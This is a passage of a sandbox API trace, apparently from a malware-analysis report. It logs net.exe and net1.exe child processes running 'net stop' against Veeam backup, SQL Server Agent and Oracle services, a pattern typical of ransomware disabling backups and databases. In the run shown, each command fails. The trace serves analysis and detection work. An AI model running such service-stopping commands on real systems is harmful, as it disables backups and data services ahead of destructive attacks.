_wcsicmp (_String1="alerter", _String2="VEEAMENTERPRISEMANAGERSVC") returned -21 [0212.571] _wcsicmp (_String1="netlogon", _String2="VEEAMENTERPRISEMANAGERSVC") returned -8 [0212.571] NetServiceControl (in: servername=0x0, service="VEEAMENTERPRISEMANAGERSVC", opcode=0x0, arg=0x0, bufptr=0x29f8d4 | out: bufptr=0x29f8d4) returned 0x889 [0212.572] wcscpy_s (in: _Destination=0xb4a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0212.572] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0212.573] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xb4b338, nSize=0x800, Arguments=0xb49dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0212.574] GetFileType (hFile=0x26c) returned 0x3 [0212.574] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x573ca0 [0212.574] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x573ca0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0212.574] WriteFile (in: hFile=0x26c, lpBuffer=0x573ca0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x29f814, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29f814, lpOverlapped=0x0) returned 0 [0212.574] LocalFree (hMem=0x573ca0) returned 0x0 [0212.574] GetFileType (hFile=0x26c) returned 0x3 [0212.574] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x576298 [0212.574] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x576298, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nW", lpUsedDefaultChar=0x0) returned 2 [0212.574] WriteFile (in: hFile=0x26c, lpBuffer=0x576298, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x29f814, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29f814, lpOverlapped=0x0) returned 0 [0212.574] LocalFree (hMem=0x576298) returned 0x0 [0212.574] _ultow (in: _Dest=0x889, _Radix=2750532 | out: _Dest=0x889) returned="2185" [0212.574] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xb4b338, nSize=0x800, Arguments=0xb49dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0212.575] GetFileType (hFile=0x26c) returned 0x3 [0212.575] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x576298 [0212.575] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x576298, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0212.575] WriteFile (in: hFile=0x26c, lpBuffer=0x576298, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x29f820, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29f820, lpOverlapped=0x0) returned 0 [0212.575] LocalFree (hMem=0x576298) returned 0x0 [0212.575] GetFileType (hFile=0x26c) returned 0x3 [0212.575] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x576298 [0212.575] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x576298, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nW", lpUsedDefaultChar=0x0) returned 2 [0212.575] WriteFile (in: hFile=0x26c, lpBuffer=0x576298, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x29f820, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29f820, lpOverlapped=0x0) returned 0 [0212.575] LocalFree (hMem=0x576298) returned 0x0 [0212.575] NetApiBufferFree (Buffer=0x571c90) returned 0x0 [0212.576] NetApiBufferFree (Buffer=0x571ca8) returned 0x0 [0212.576] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamEnterpriseManagerSvc /y" [0212.576] exit (_Code=2) Process: id = "310" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4aecb000" os_pid = "0x9f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLAgent$SQLEXPRESS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 483 os_tid = 0x8c4 Process: id = "311" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5d220000" os_pid = "0x544" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "310" os_parent_pid = "0x9f8" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$SQLEXPRESS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 484 os_tid = 0x81c [0212.720] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef79c | out: lpSystemTimeAsFileTime=0x2ef79c*(dwLowDateTime=0x47fa8640, dwHighDateTime=0x1d57a87)) [0212.720] GetCurrentProcessId () returned 0x544 [0212.720] GetCurrentThreadId () returned 0x81c [0212.720] GetTickCount () returned 0x116ec04 [0212.720] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef794 | out: lpPerformanceCount=0x2ef794*=33300441145) returned 1 [0212.720] GetModuleHandleA (lpModuleName=0x0) returned 0xa30000 [0212.720] __set_app_type (_Type=0x1) [0212.720] __p__fmode () returned 0x74eb31f4 [0212.720] __p__commode () returned 0x74eb31fc [0212.720] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa3ffe6) returned 0x0 [0212.720] __getmainargs (in: _Argc=0xa49064, _Argv=0xa4906c, _Env=0xa49068, _DoWildCard=0, _StartInfo=0xa49024 | out: _Argc=0xa49064, _Argv=0xa4906c, _Env=0xa49068) returned 0 [0212.721] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0212.721] GetConsoleOutputCP () returned 0x1b5 [0212.721] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xa49080 | out: lpCPInfo=0xa49080) returned 1 [0212.721] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.724] sprintf_s (in: _DstBuf=0x2ef754, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0212.724] setlocale (category=0, locale=".437") returned="English_United States.437" [0212.726] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0212.726] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0212.726] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SQLEXPRESS /y" [0212.726] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ef520, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0212.726] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x0, Size=0x7a) returned 0x3a3c20 [0212.726] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0212.727] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ef724 | out: Buffer=0x2ef724*=0x3a1c80) returned 0x0 [0212.727] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ef724 | out: Buffer=0x2ef724*=0x3a1c98) returned 0x0 [0212.727] _fileno (_File=0x74eb2900) returned -2 [0212.727] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0212.727] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0212.727] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0212.727] _wcsicmp (_String1="config", _String2="stop") returned -16 [0212.727] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0212.727] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0212.727] _wcsicmp (_String1="file", _String2="stop") returned -13 [0212.727] _wcsicmp (_String1="files", _String2="stop") returned -13 [0212.727] _wcsicmp (_String1="group", _String2="stop") returned -12 [0212.727] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0212.727] _wcsicmp (_String1="help", _String2="stop") returned -11 [0212.727] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0212.727] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0212.727] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0212.727] _wcsicmp (_String1="session", _String2="stop") returned -15 [0212.727] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0212.727] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0212.727] _wcsicmp (_String1="share", _String2="stop") returned -12 [0212.727] _wcsicmp (_String1="start", _String2="stop") returned -14 [0212.727] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0212.727] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0212.727] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0212.727] _wcsicmp (_String1="accounts", _String2="SQLAgent$SQLEXPRESS") returned -18 [0212.727] _wcsicmp (_String1="computer", _String2="SQLAgent$SQLEXPRESS") returned -16 [0212.727] _wcsicmp (_String1="config", _String2="SQLAgent$SQLEXPRESS") returned -16 [0212.727] _wcsicmp (_String1="continue", _String2="SQLAgent$SQLEXPRESS") returned -16 [0212.727] _wcsicmp (_String1="cont", _String2="SQLAgent$SQLEXPRESS") returned -16 [0212.727] _wcsicmp (_String1="file", _String2="SQLAgent$SQLEXPRESS") returned -13 [0212.727] _wcsicmp (_String1="files", _String2="SQLAgent$SQLEXPRESS") returned -13 [0212.727] _wcsicmp (_String1="group", _String2="SQLAgent$SQLEXPRESS") returned -12 [0212.728] _wcsicmp (_String1="groups", _String2="SQLAgent$SQLEXPRESS") returned -12 [0212.728] _wcsicmp (_String1="help", _String2="SQLAgent$SQLEXPRESS") returned -11 [0212.728] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$SQLEXPRESS") returned -11 [0212.728] _wcsicmp (_String1="localgroup", _String2="SQLAgent$SQLEXPRESS") returned -7 [0212.728] _wcsicmp (_String1="pause", _String2="SQLAgent$SQLEXPRESS") returned -3 [0212.728] _wcsicmp (_String1="session", _String2="SQLAgent$SQLEXPRESS") returned -12 [0212.728] _wcsicmp (_String1="sessions", _String2="SQLAgent$SQLEXPRESS") returned -12 [0212.728] _wcsicmp (_String1="sess", _String2="SQLAgent$SQLEXPRESS") returned -12 [0212.728] _wcsicmp (_String1="share", _String2="SQLAgent$SQLEXPRESS") returned -9 [0212.728] _wcsicmp (_String1="start", _String2="SQLAgent$SQLEXPRESS") returned 3 [0212.728] _wcsicmp (_String1="stats", _String2="SQLAgent$SQLEXPRESS") returned 3 [0212.728] _wcsicmp (_String1="statistics", _String2="SQLAgent$SQLEXPRESS") returned 3 [0212.728] _wcsicmp (_String1="stop", _String2="SQLAgent$SQLEXPRESS") returned 3 [0212.728] _wcsicmp (_String1="time", _String2="SQLAgent$SQLEXPRESS") returned 1 [0212.728] _wcsicmp (_String1="user", _String2="SQLAgent$SQLEXPRESS") returned 2 [0212.728] _wcsicmp (_String1="users", _String2="SQLAgent$SQLEXPRESS") returned 2 [0212.728] _wcsicmp (_String1="msg", _String2="SQLAgent$SQLEXPRESS") returned -6 [0212.728] _wcsicmp (_String1="messenger", _String2="SQLAgent$SQLEXPRESS") returned -6 [0212.728] _wcsicmp (_String1="receiver", _String2="SQLAgent$SQLEXPRESS") returned -1 [0212.728] _wcsicmp (_String1="rcv", _String2="SQLAgent$SQLEXPRESS") returned -1 [0212.728] _wcsicmp (_String1="netpopup", _String2="SQLAgent$SQLEXPRESS") returned -5 [0212.728] _wcsicmp (_String1="redirector", _String2="SQLAgent$SQLEXPRESS") returned -1 [0212.728] _wcsicmp (_String1="redir", _String2="SQLAgent$SQLEXPRESS") returned -1 [0212.728] _wcsicmp (_String1="rdr", _String2="SQLAgent$SQLEXPRESS") returned -1 [0212.728] _wcsicmp (_String1="workstation", _String2="SQLAgent$SQLEXPRESS") returned 4 [0212.728] _wcsicmp (_String1="work", _String2="SQLAgent$SQLEXPRESS") returned 4 [0212.728] _wcsicmp (_String1="wksta", _String2="SQLAgent$SQLEXPRESS") returned 4 [0212.728] _wcsicmp (_String1="prdr", _String2="SQLAgent$SQLEXPRESS") returned -3 [0212.728] _wcsicmp (_String1="devrdr", _String2="SQLAgent$SQLEXPRESS") returned -15 [0212.728] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$SQLEXPRESS") returned -7 [0212.728] _wcsicmp (_String1="server", _String2="SQLAgent$SQLEXPRESS") returned -12 [0212.728] _wcsicmp (_String1="svr", _String2="SQLAgent$SQLEXPRESS") returned 5 [0212.728] _wcsicmp (_String1="srv", _String2="SQLAgent$SQLEXPRESS") returned 1 [0212.728] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$SQLEXPRESS") returned -7 [0212.728] _wcsicmp (_String1="alerter", _String2="SQLAgent$SQLEXPRESS") returned -18 [0212.728] _wcsicmp (_String1="netlogon", _String2="SQLAgent$SQLEXPRESS") returned -5 [0212.729] _wcsupr (in: _String="SQLAgent$SQLEXPRESS" | out: _String="SQLAGENT$SQLEXPRESS") returned="SQLAGENT$SQLEXPRESS" [0212.729] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3a54f0 [0212.731] GetServiceKeyNameW (in: hSCManager=0x3a54f0, lpDisplayName="SQLAGENT$SQLEXPRESS", lpServiceName=0xa4aaf0, lpcchBuffer=0x2ef6c0 | out: lpServiceName="", lpcchBuffer=0x2ef6c0) returned 0 [0212.732] _wcsicmp (_String1="msg", _String2="SQLAGENT$SQLEXPRESS") returned -6 [0212.732] _wcsicmp (_String1="messenger", _String2="SQLAGENT$SQLEXPRESS") returned -6 [0212.732] _wcsicmp (_String1="receiver", _String2="SQLAGENT$SQLEXPRESS") returned -1 [0212.732] _wcsicmp (_String1="rcv", _String2="SQLAGENT$SQLEXPRESS") returned -1 [0212.732] _wcsicmp (_String1="redirector", _String2="SQLAGENT$SQLEXPRESS") returned -1 [0212.732] _wcsicmp (_String1="redir", _String2="SQLAGENT$SQLEXPRESS") returned -1 [0212.732] _wcsicmp (_String1="rdr", _String2="SQLAGENT$SQLEXPRESS") returned -1 [0212.732] _wcsicmp (_String1="workstation", _String2="SQLAGENT$SQLEXPRESS") returned 4 [0212.732] _wcsicmp (_String1="work", _String2="SQLAGENT$SQLEXPRESS") returned 4 [0212.732] _wcsicmp (_String1="wksta", _String2="SQLAGENT$SQLEXPRESS") returned 4 [0212.732] _wcsicmp (_String1="prdr", _String2="SQLAGENT$SQLEXPRESS") returned -3 [0212.732] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$SQLEXPRESS") returned -15 [0212.732] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$SQLEXPRESS") returned -7 [0212.732] _wcsicmp (_String1="server", _String2="SQLAGENT$SQLEXPRESS") returned -12 [0212.732] _wcsicmp (_String1="svr", _String2="SQLAGENT$SQLEXPRESS") returned 5 [0212.732] _wcsicmp (_String1="srv", _String2="SQLAGENT$SQLEXPRESS") returned 1 [0212.732] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$SQLEXPRESS") returned -7 [0212.732] _wcsicmp (_String1="alerter", _String2="SQLAGENT$SQLEXPRESS") returned -18 [0212.732] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$SQLEXPRESS") returned -5 [0212.732] NetServiceControl (in: servername=0x0, service="SQLAGENT$SQLEXPRESS", opcode=0x0, arg=0x0, bufptr=0x2ef6bc | out: bufptr=0x2ef6bc) returned 0x889 [0212.733] wcscpy_s (in: _Destination=0xa4a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0212.733] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0212.734] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xa4b338, nSize=0x800, Arguments=0xa49dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0212.735] GetFileType (hFile=0x26c) returned 0x3 [0212.735] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x3a4020 [0212.735] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x3a4020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n9", lpUsedDefaultChar=0x0) returned 30 [0212.735] WriteFile (in: hFile=0x26c, lpBuffer=0x3a4020, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2ef5fc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ef5fc, lpOverlapped=0x0) returned 0 [0212.735] LocalFree (hMem=0x3a4020) returned 0x0 [0212.735] GetFileType (hFile=0x26c) returned 0x3 [0212.735] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3a62c8 [0212.735] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3a62c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n:", lpUsedDefaultChar=0x0) returned 2 [0212.735] WriteFile (in: hFile=0x26c, lpBuffer=0x3a62c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ef5fc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ef5fc, lpOverlapped=0x0) returned 0 [0212.735] LocalFree (hMem=0x3a62c8) returned 0x0 [0212.735] _ultow (in: _Dest=0x889, _Radix=3077676 | out: _Dest=0x889) returned="2185" [0212.735] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xa4b338, nSize=0x800, Arguments=0xa49dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0212.736] GetFileType (hFile=0x26c) returned 0x3 [0212.736] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3a62c8 [0212.736] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3a62c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0212.736] WriteFile (in: hFile=0x26c, lpBuffer=0x3a62c8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2ef608, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ef608, lpOverlapped=0x0) returned 0 [0212.736] LocalFree (hMem=0x3a62c8) returned 0x0 [0212.736] GetFileType (hFile=0x26c) returned 0x3 [0212.736] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3a62c8 [0212.736] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3a62c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n:", lpUsedDefaultChar=0x0) returned 2 [0212.736] WriteFile (in: hFile=0x26c, lpBuffer=0x3a62c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ef608, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ef608, lpOverlapped=0x0) returned 0 [0212.736] LocalFree (hMem=0x3a62c8) returned 0x0 [0212.736] NetApiBufferFree (Buffer=0x3a1c80) returned 0x0 [0212.737] NetApiBufferFree (Buffer=0x3a1c98) returned 0x0 [0212.737] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SQLEXPRESS /y" [0212.737] exit (_Code=2) Process: id = "312" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x60ad0000" os_pid = "0x874" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop OracleClientCache80 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 485 os_tid = 0x2ec Process: id = "313" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4cbf4000" os_pid = "0x260" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "312" os_parent_pid = "0x874" cmd_line = "C:\\Windows\\system32\\net1 stop OracleClientCache80 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 486 os_tid = 0x93c [0212.878] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x34f7e0 | out: lpSystemTimeAsFileTime=0x34f7e0*(dwLowDateTime=0x48125400, dwHighDateTime=0x1d57a87)) [0212.878] GetCurrentProcessId () returned 0x260 [0212.878] GetCurrentThreadId () returned 0x93c [0212.878] GetTickCount () returned 0x116eca0 [0212.878] QueryPerformanceCounter (in: lpPerformanceCount=0x34f7d8 | out: lpPerformanceCount=0x34f7d8*=33316307452) returned 1 [0212.879] GetModuleHandleA (lpModuleName=0x0) returned 0xc10000 [0212.879] __set_app_type (_Type=0x1) [0212.879] __p__fmode () returned 0x74eb31f4 [0212.879] __p__commode () returned 0x74eb31fc [0212.879] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xc1ffe6) returned 0x0 [0212.879] __getmainargs (in: _Argc=0xc29064, _Argv=0xc2906c, _Env=0xc29068, _DoWildCard=0, _StartInfo=0xc29024 | out: _Argc=0xc29064, _Argv=0xc2906c, _Env=0xc29068) returned 0 [0212.879] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0212.879] GetConsoleOutputCP () returned 0x1b5 [0212.889] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xc29080 | out: lpCPInfo=0xc29080) returned 1 [0212.889] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.892] sprintf_s (in: _DstBuf=0x34f798, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0212.892] setlocale (category=0, locale=".437") returned="English_United States.437" [0212.894] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0212.894] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0212.894] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop OracleClientCache80 /y" [0212.894] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x34f564, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0212.894] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x7a) returned 0x3d3c20 [0212.894] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0212.895] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x34f768 | out: Buffer=0x34f768*=0x3d1c80) returned 0x0 [0212.895] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x34f768 | out: Buffer=0x34f768*=0x3d1c98) returned 0x0 [0212.895] _fileno (_File=0x74eb2900) returned -2 [0212.895] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0212.895] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0212.895] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0212.895] _wcsicmp (_String1="config", _String2="stop") returned -16 [0212.895] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0212.895] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0212.895] _wcsicmp (_String1="file", _String2="stop") returned -13 [0212.895] _wcsicmp (_String1="files", _String2="stop") returned -13 [0212.895] _wcsicmp (_String1="group", _String2="stop") returned -12 [0212.895] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0212.895] _wcsicmp (_String1="help", _String2="stop") returned -11 [0212.895] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0212.895] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0212.895] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0212.895] _wcsicmp (_String1="session", _String2="stop") returned -15 [0212.895] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0212.895] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0212.895] _wcsicmp (_String1="share", _String2="stop") returned -12 [0212.895] _wcsicmp (_String1="start", _String2="stop") returned -14 [0212.895] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0212.895] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0212.895] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0212.895] _wcsicmp (_String1="accounts", _String2="OracleClientCache80") returned -14 [0212.895] _wcsicmp (_String1="computer", _String2="OracleClientCache80") returned -12 [0212.896] _wcsicmp (_String1="config", _String2="OracleClientCache80") returned -12 [0212.896] _wcsicmp (_String1="continue", _String2="OracleClientCache80") returned -12 [0212.896] _wcsicmp (_String1="cont", _String2="OracleClientCache80") returned -12 [0212.896] _wcsicmp (_String1="file", _String2="OracleClientCache80") returned -9 [0212.896] _wcsicmp (_String1="files", _String2="OracleClientCache80") returned -9 [0212.896] _wcsicmp (_String1="group", _String2="OracleClientCache80") returned -8 [0212.896] _wcsicmp (_String1="groups", _String2="OracleClientCache80") returned -8 [0212.896] _wcsicmp (_String1="help", _String2="OracleClientCache80") returned -7 [0212.896] _wcsicmp (_String1="helpmsg", _String2="OracleClientCache80") returned -7 [0212.896] _wcsicmp (_String1="localgroup", _String2="OracleClientCache80") returned -3 [0212.896] _wcsicmp (_String1="pause", _String2="OracleClientCache80") returned 1 [0212.896] _wcsicmp (_String1="session", _String2="OracleClientCache80") returned 4 [0212.896] _wcsicmp (_String1="sessions", _String2="OracleClientCache80") returned 4 [0212.896] _wcsicmp (_String1="sess", _String2="OracleClientCache80") returned 4 [0212.896] _wcsicmp (_String1="share", _String2="OracleClientCache80") returned 4 [0212.896] _wcsicmp (_String1="start", _String2="OracleClientCache80") returned 4 [0212.896] _wcsicmp (_String1="stats", _String2="OracleClientCache80") returned 4 [0212.896] _wcsicmp (_String1="statistics", _String2="OracleClientCache80") returned 4 [0212.896] _wcsicmp (_String1="stop", _String2="OracleClientCache80") returned 4 [0212.896] _wcsicmp (_String1="time", _String2="OracleClientCache80") returned 5 [0212.896] _wcsicmp (_String1="user", _String2="OracleClientCache80") returned 6 [0212.896] _wcsicmp (_String1="users", _String2="OracleClientCache80") returned 6 [0212.896] _wcsicmp (_String1="msg", _String2="OracleClientCache80") returned -2 [0212.896] _wcsicmp (_String1="messenger", 